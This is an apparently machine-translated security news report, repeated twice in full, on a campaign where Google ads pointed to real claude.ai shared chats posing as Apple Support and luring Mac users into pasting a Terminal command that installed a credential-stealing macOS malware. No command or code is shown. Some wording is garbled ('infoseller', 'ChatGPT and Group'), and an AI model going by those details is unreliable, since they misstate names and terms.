The attackers hid the trap where users were least waiting for a catch.
The attackers found an unusual way to bypass the trust of users in familiar services. In the new campaign, malicious advertising in Google does not lead to a fake site, but to a real domain Claude.ai. The danger is hidden further - in the published chat rooms, where the instructions under the guise of installing the Claude Code for Mac causes the computer owner to start the infection himself.
The fraudulent campaign was noticed Trendyol Group security engineer Burke Albayrak. According to him, one of the public chats Claude.ai presented itself as the official management of “Apple Support” to install the Claude Code on macOS. The user was asked to open the Terminal and insert a command that without any signs downloaded and ran malicious code.
The publication BleepingComputer during the inspection found another chat with the same scheme, but with a different infrastructure. In both cases, users could get to the pages through Google’s advertising results on the Claude mac download. The advertisement showed the real address of claude.ai, so the usual domain check did not help to recognize the threat.
In one variant of the attack, the command loaded a compressed shell script from a remote server that worked in memory and left almost no traces on the disk. The server each time gave a different disguised version of the payload to complicate the check through the hash or signature.
The sample, studied by BleepingComputer, collected an external IP address, host name and version of macOS, and then transmitted information to the intruders’ server. After that, the script loaded the next stage and ran it through osascript, the built-in macOS automation mechanism. This approach gives remote command execution without installing a familiar application or a separate executable file.
The option described by Burke Albayrak acted more directly and immediately turned to data theft. The malware collected the accounting data of browsers, cookies and the contents of Keychain, and then sent the archive to the operator's server. Albayrak linked the sample with the MacSync infoseller for macOS.
The scheme differs from the usual malicious advertising in that attackers do not even need to register a similar domain. The user sees the real address Claude.ai both before clicking on the link, and after, but gets into the general chat with dangerous instructions. Previously, a similar technique has already been used against users ChatGPT and Group.
Anthropic offers to download the native Claude application directly from claude.ai, and Claude Code CLI is installed according to official documentation. Commands for Terminal from advertising transitions and public chats are better to check separately, even when the page looks legitimate.
The attackers found an unusual way to bypass the trust of users in familiar services. In the new campaign, malicious advertising in Google does not lead to a fake site, but to a real domain Claude.ai. The danger is hidden further - in the published chat rooms, where the instructions under the guise of installing the Claude Code for Mac causes the computer owner to start the infection himself.
The fraudulent campaign was noticed Trendyol Group security engineer Burke Albayrak. According to him, one of the public chats Claude.ai presented itself as the official management of “Apple Support” to install the Claude Code on macOS. The user was asked to open the Terminal and insert a command that without any signs downloaded and ran malicious code.
The publication BleepingComputer during the inspection found another chat with the same scheme, but with a different infrastructure. In both cases, users could get to the pages through Google’s advertising results on the Claude mac download. The advertisement showed the real address of claude.ai, so the usual domain check did not help to recognize the threat.
In one variant of the attack, the command loaded a compressed shell script from a remote server that worked in memory and left almost no traces on the disk. The server each time gave a different disguised version of the payload to complicate the check through the hash or signature.
The sample, studied by BleepingComputer, collected an external IP address, host name and version of macOS, and then transmitted information to the intruders’ server. After that, the script loaded the next stage and ran it through osascript, the built-in macOS automation mechanism. This approach gives remote command execution without installing a familiar application or a separate executable file.
The option described by Burke Albayrak acted more directly and immediately turned to data theft. The malware collected the accounting data of browsers, cookies and the contents of Keychain, and then sent the archive to the operator's server. Albayrak linked the sample with the MacSync infoseller for macOS.
The scheme differs from the usual malicious advertising in that attackers do not even need to register a similar domain. The user sees the real address Claude.ai both before clicking on the link, and after, but gets into the general chat with dangerous instructions. Previously, a similar technique has already been used against users ChatGPT and Group.
Anthropic offers to download the native Claude application directly from claude.ai, and Claude Code CLI is installed according to official documentation. Commands for Terminal from advertising transitions and public chats are better to check separately, even when the page looks legitimate.
